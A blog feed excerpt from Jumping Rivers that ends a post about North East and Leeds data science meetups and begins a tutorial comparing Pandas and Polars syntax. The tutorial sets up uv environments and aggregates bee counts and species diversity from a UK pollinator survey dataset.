&lt;p&gt;At some NEDS meetups we also run a &amp;ldquo;pre-event workshop&amp;rdquo;, where attendees get a hands-on introduction to a data science topic. Previous workshops have delved into &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/308683560/?eventOrigin=group_events_list" rel="external"&gt;machine learning with Python&lt;/a&gt;, &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/304415217/?eventOrigin=group_events_list" rel="external"&gt;machine learning operations (MLOps)&lt;/a&gt; and &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/298710020/?eventOrigin=group_events_list" rel="external"&gt;statistical modelling with R&lt;/a&gt;. The pre-event workshops run from 5pm to 6pm, but do check if there is a pre-event workshop in the schedule so that you don&amp;rsquo;t accidentally arrive an hour early!&lt;/p&gt;
&lt;h2 id="how-to-get-involved"&gt;How to get involved&lt;/h2&gt;
&lt;p&gt;To sign up to our mailing lists, please join the &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;North East Data Scientists&lt;/a&gt; and &lt;a href="https://www.meetup.com/leeds-data-science-meetup/" rel="external"&gt;Leeds Data Science Meetup&lt;/a&gt; communities. A meetup.com account is free to set up, and you will have access to lots of great local meetups (not just data science). You will then be notified about upcoming meetups organised by the communities you have joined.&lt;/p&gt;
&lt;p&gt;Although our events are free to attend, we still require you to register in advance via meetup.com so that we have an idea of numbers when planning the room setup and catering.&lt;/p&gt;
&lt;p&gt;We are always on the lookout for speakers and workshop organisers! If you would like to volunteer yourself for a talk or workshop, or have any announcements to share with the community about job opportunities and events, please reach out to the following addresses:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="mailto:neds@jumpingrivers.com" rel="external"&gt;neds@jumpingrivers.com&lt;/a&gt; for the NEDS organising team.&lt;/li&gt;
&lt;li&gt;&lt;a href="mailto:lds@jumpingrivers.com" rel="external"&gt;lds@jumpingrivers.com&lt;/a&gt; for the LeeDS organising team.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can&amp;rsquo;t wait to hear from you!&lt;/p&gt;
&lt;h2 id="contributing-to-the-data-science-community"&gt;Contributing to the data science community&lt;/h2&gt;
&lt;p&gt;Hosting meetups is just one of our ways of contributing to the data science community.&lt;/p&gt;
&lt;p&gt;Over the past few years we have also been organising an annual Shiny In Production conference. This typically involves a half day of workshops followed by a full day of talks from prominent speakers on all things Shiny and web dashboards. Check out our recent &lt;a href="https://www.jumpingrivers.com/blog/sip2025-shiny-conference-summary/"&gt;Shiny In Production 2025 highlights blog&lt;/a&gt; to find out about our latest conference that ran in October.&lt;/p&gt;
&lt;p&gt;Next year will be particularly exciting, as we organise our first ever &lt;strong&gt;AI In Production&lt;/strong&gt; conference (4-5 June 2026). This will take a similar format with a day of workshops followed by a day of talks. Expect topics including LLMs and MLOps. For more details about this and how to sign up, check out the Eventbrite listing &lt;a href="https://www.eventbrite.co.uk/e/ai-in-production-registration-1777831163869?aff=ebdssbcategorybrowse" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also organise a free monthly webinar series. Check out &lt;a href="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/"&gt;this blog&lt;/a&gt; with details of what to expect and how to sign up.&lt;/p&gt;
&lt;p&gt;Finally, we also develop software that is freely available to the data science community. Have you heard of &lt;a href="https://diffify.com/" rel="external"&gt;diffify.com&lt;/a&gt;? This is a free-to-use website that we have developed internally, which allows you to compare any two versions of your favourite R or Python packages. We are proud of how diffify has grown over the years, and are excited to bring you more updates very soon, so stay tuned!&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s all for this post. We look forward to seeing some new faces at our data science meetups in the near future!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/data-science-meetups-community/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Polars and Pandas - Working with the Data-Frame</title><link>https://www.jumpingrivers.com/blog/python-df-syntax/</link><pubDate>Thu, 06 Nov 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-df-syntax/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-df-syntax/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-df-syntax/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Biodiversity.
We&amp;rsquo;d like more of it.
More of each thing, and more different types of thing.
And more of the things that help make more of the different types of thing.&lt;/p&gt;
&lt;p&gt;But can you have too many things?&lt;/p&gt;
&lt;p&gt;In Data Science we are often working with rectangular data structures - databases, spreadsheets,
data-frames. Within Python alone, there are multiple ways to work with this type of data, and your
choice is constrained by data volume, storage, fluency and so on. For datasets that could readily be
held in memory on a single computer, the standard Python tool for rectangling is
&lt;a href="https://pandas.pydata.org/" rel="external"&gt;Pandas&lt;/a&gt;,
which became an open-source project in 2009. Many other tools now exist though.
In particular, the
&lt;a href="https://pola.rs/" rel="external"&gt;Polars&lt;/a&gt; library has become extremely popular in Python over recent years.
But when Pandas works, is well-supported, and is the standard tool in your team or your domain,
and if you are primarily working with in-memory datasets, is there value in learning a new
data-wrangling tool? Of course there is.&lt;/p&gt;
&lt;p&gt;But this is a blog post, not a course, so what we&amp;rsquo;ll do here is compare the Pandas and Polars syntax
for some standard data-manipulation code. We will also introduce a new bit of syntax that Pandas
3.0 will be introducing soon.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-df-syntax"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Let&amp;rsquo;s talk about pollinators.&lt;/p&gt;
&lt;p&gt;
There's a nice dataset about pollinators and plants found in areas of the UK available
on the
&lt;a href="https://catalogue.ceh.ac.uk/documents/4a565007-d3a1-468d-9f84-70ec7594fafe"&gt;UK Centre for Ecology and Hydrology (UKCEH) website&lt;/a&gt;.
See the full citation below. Briefly, the dataset contains counts of different types of pollinators
in a range of 1 km&lt;sup&gt;2&lt;/sup&gt; grids across the UK. With it, we can see trends over time in pollinator
numbers.
&lt;/p&gt;
&lt;h3 id="installation"&gt;Installation&lt;/h3&gt;
&lt;p&gt;We will use separate &lt;a href="https://docs.astral.sh/uv/" rel="external"&gt;&amp;lsquo;uv&amp;rsquo;-based&lt;/a&gt; projects to analyse the UKCEH dataset,
by installing Polars, Pandas 2 and Pandas 3 into different virtual environments. See our recent
summary of
&lt;a href="https://www.jumpingrivers.com/blog/whats-new-py314/" rel="external"&gt;2025 trends in Python&lt;/a&gt; to get more information
about &amp;lsquo;uv&amp;rsquo;.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s install some bears inside a snake and analyse some bees:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Make separate environments for pandas2, pandas3, polars:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv init pandas2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd pandas2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv add &lt;span style="color:#a5d6ff"&gt;&amp;#34;pandas==2.3.3&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run python -c &lt;span style="color:#a5d6ff"&gt;&amp;#34;import pandas; print(pandas.__version__)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 2.3.3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd ..
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For Pandas 3, we are going to install a development version of the package. One way to do this in uv is using &lt;code&gt;uv pip install&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv init pandas3
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd pandas3
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv venv &lt;span style="color:#8b949e;font-style:italic"&gt;# explicitly initialise the virtual env&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv pip install --pre &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; --extra-index-url https://pypi.anaconda.org/scientific-python-nightly-wheels/simple &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; pandas
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Resolved 5 packages in 2.35s&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Installed 5 packages in 31ms&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + numpy==2.4.0.dev0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + pandas==3.0.0.dev0+2562.ga329dc353a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + python-dateutil==2.9.0.post0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + six==1.17.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# + tzdata==2025.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# (Note this venv isn&amp;#39;t managed by uv...)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run python -c &lt;span style="color:#a5d6ff"&gt;&amp;#34;import pandas; print(pandas.__version__)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 3.0.0.dev0+2562.ga329dc353a&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd ..
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we&amp;rsquo;ll install &lt;code&gt;polars&lt;/code&gt; into a separate project.
I&amp;rsquo;ve called this project &lt;code&gt;polars-proj&lt;/code&gt;.
If the project had been called &lt;code&gt;polars&lt;/code&gt;, we couldn&amp;rsquo;t have installed
the polars package within it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# We can&amp;#39;t call this project &amp;#39;polars&amp;#39;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# as we&amp;#39;ll be installing the &amp;#39;polars&amp;#39; package inside it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv init polars-proj
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd polars-proj
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv add &lt;span style="color:#a5d6ff"&gt;&amp;#34;polars==1.34.0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd ../
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So we now have three different projects (&amp;lsquo;pandas2&amp;rsquo;, &amp;lsquo;pandas3&amp;rsquo;, and &amp;lsquo;polars-proj&amp;rsquo;).&lt;/p&gt;
&lt;h2 id="download-the-data"&gt;Download the data&lt;/h2&gt;
&lt;p&gt;Data was downloaded from
&lt;a href="https://catalogue.ceh.ac.uk/documents/4a565007-d3a1-468d-9f84-70ec7594fafe" rel="external"&gt;ceh.ac.uk&lt;/a&gt;
and stored in &lt;code&gt;./data/ukpoms_1kmpantrapdata_2017-2022_insects.csv&lt;/code&gt;.
See the citation below if you wish to work with this data.&lt;/p&gt;
&lt;p&gt;As of the start of November 2025, this dataset has been downloaded 29 times.&lt;/p&gt;
&lt;h2 id="data-processing"&gt;Data processing&lt;/h2&gt;
&lt;h3 id="pandas-2"&gt;Pandas 2&lt;/h3&gt;
&lt;p&gt;Pandas 2 offers a well-known Python syntax for data-frame work.
From the &lt;code&gt;pandas2&lt;/code&gt; project, we can open a Jupyter notebook based on the pandas2 virtual environment:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [bash]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uv run --with jupyter jupyter lab
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will read in the data and then make some summaries, to produce an output table:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pollinators &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;../data/ukpoms_1kmpantrapdata_2017-2022_insects.csv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; encoding&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;ISO-8859-1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Bees, and related species, are from the order &amp;ldquo;Hymenoptera&amp;rdquo;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pollinators[pollinators[&lt;span style="color:#a5d6ff"&gt;&amp;#34;order&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hymenoptera&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 9245 rows, 16 columns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Within &lt;code&gt;bees&lt;/code&gt; we find a range of interestingly-named insects: nomad bees, small shaggy bees, the
impunctate mini-miner, a few Buffish mining bees and a clutch of heather girdled Colletes, amongst
others. So I&amp;rsquo;m wondering how many bees and how many different species are observed in a given
sector.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bees[&lt;span style="color:#a5d6ff"&gt;&amp;#34;english_name&amp;#34;&lt;/span&gt;]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# array([&amp;#39;Common Yellow-face Bee&amp;#39;, &amp;#39;Red-tailed Bumblebee&amp;#39;,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# &amp;#39;Common Carder Bee&amp;#39;, &amp;#39;Bloomed Furrow Bee&amp;#39;, ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;
We have a &lt;code&gt;sample_id&lt;/code&gt; and an &lt;code&gt;occurrence_id&lt;/code&gt; column. There may be multiple rows with the same
&lt;code&gt;sample_id&lt;/code&gt;, but each row has a unique &lt;code&gt;occurrence_id&lt;/code&gt;. The &lt;code&gt;sample_id&lt;/code&gt; defines the
1 km&lt;sup&gt;2&lt;/sup&gt; sector in which a given pollinator count was performed - there are multiple rows, because there are
typically multiple pollinators present in a sector. Any given &lt;code&gt;sample_id&lt;/code&gt; is present for only one
year (not shown).
&lt;/p&gt;
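&lt;p&gt;The statements above about &lt;code&gt;sample_id&lt;/code&gt; and &lt;code&gt;occurrence_id&lt;/code&gt; can be checked in a couple of lines. As a minimal sketch, the toy data-frame below stands in for &lt;code&gt;bees&lt;/code&gt;: its values are invented for illustration, and only the column names come from the dataset.&lt;/p&gt;

```python
import pandas as pd

# Toy stand-in for the real table: the values are invented,
# only the column names match the UKCEH dataset.
toy = pd.DataFrame({
    "occurrence_id": [1, 2, 3, 4, 5],
    "sample_id": [10, 10, 11, 11, 12],
    "year": [2019, 2019, 2020, 2020, 2021],
})

# Does every row have its own occurrence_id?
occurrence_ids_unique = toy["occurrence_id"].is_unique

# How many distinct years are recorded against each sample_id?
years_per_sample = toy.groupby("sample_id")["year"].nunique()
one_year_per_sample = bool((years_per_sample == 1).all())

print(occurrence_ids_unique, one_year_per_sample)
```

&lt;p&gt;Swapping &lt;code&gt;toy&lt;/code&gt; for &lt;code&gt;bees&lt;/code&gt; would run the same two checks on the real data.&lt;/p&gt;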
&lt;p&gt;So what we want to do is group the dataset by &lt;code&gt;sample_id&lt;/code&gt; and count up the bees within that sector.
We will store the year along with the &lt;code&gt;sample_id&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can count up the observations in each sector as follows. Here we are summing the number of
observed insects (aggregating the &amp;lsquo;count&amp;rsquo; column using the &amp;lsquo;sum&amp;rsquo; function) and counting the number
of distinct taxa in the sector (the length of the unique entries in the &lt;code&gt;taxon_standardised&lt;/code&gt; column).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bee_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bees
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;groupby([&lt;span style="color:#a5d6ff"&gt;&amp;#34;sample_id&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;agg({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;sum&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;taxon_standardised&amp;#34;&lt;/span&gt;: &lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: len(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;unique())
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rename(columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;count&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;n_insects&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;taxon_standardised&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;n_species&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With that, we can view the sectors that had the most bees overall:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bee_counts&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sort_values(&lt;span style="color:#a5d6ff"&gt;&amp;#34;n_insects&amp;#34;&lt;/span&gt;, ascending&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# n_insects n_species&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# sample_id year &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 14940524 2021 28 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 15465304 2021 28 5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 6810184 2019 28 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;And the sectors that had the most bee diversity:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bee_counts&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sort_values(&lt;span style="color:#a5d6ff"&gt;&amp;#34;n_species&amp;#34;&lt;/span&gt;, ascending&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;False&lt;/span&gt;)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# n_insects n_species&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# sample_id year &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 11873611 2020 25 11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 4440178 2018 20 11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# 11745253 2020 24 11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You could do considerably more advanced analysis if you had time.&lt;/p&gt;
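&lt;p&gt;As an aside, the aggregate-then-rename pattern used for &lt;code&gt;bee_counts&lt;/code&gt; can also be written with Pandas&amp;rsquo; &amp;ldquo;named aggregation&amp;rdquo; form of &lt;code&gt;.agg()&lt;/code&gt;, which sets the output column names in the same step. The sketch below uses invented toy data rather than the UKCEH file, and swaps the lambda for the built-in &lt;code&gt;&amp;quot;nunique&amp;quot;&lt;/code&gt; aggregation. One difference to be aware of: &lt;code&gt;nunique&lt;/code&gt; ignores missing values by default, whereas &lt;code&gt;len(x.unique())&lt;/code&gt; counts them.&lt;/p&gt;

```python
import pandas as pd

# Invented toy data; only the column names follow the dataset.
toy_bees = pd.DataFrame({
    "sample_id": [10, 10, 10, 11, 11],
    "year": [2019, 2019, 2019, 2020, 2020],
    "count": [2, 1, 4, 3, 3],
    "taxon_standardised": [
        "Bombus terrestris",
        "Apis mellifera",
        "Bombus terrestris",
        "Apis mellifera",
        "Apis mellifera",
    ],
})

toy_counts = (
    toy_bees
    .groupby(["sample_id", "year"])
    .agg(
        # output_name=(input_column, aggregation)
        n_insects=("count", "sum"),
        n_species=("taxon_standardised", "nunique"),
    )
)

print(toy_counts)
```

&lt;p&gt;The result has the same shape as &lt;code&gt;bee_counts&lt;/code&gt;: one row per (&lt;code&gt;sample_id&lt;/code&gt;, &lt;code&gt;year&lt;/code&gt;) pair, with &lt;code&gt;n_insects&lt;/code&gt; and &lt;code&gt;n_species&lt;/code&gt; columns.&lt;/p&gt;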
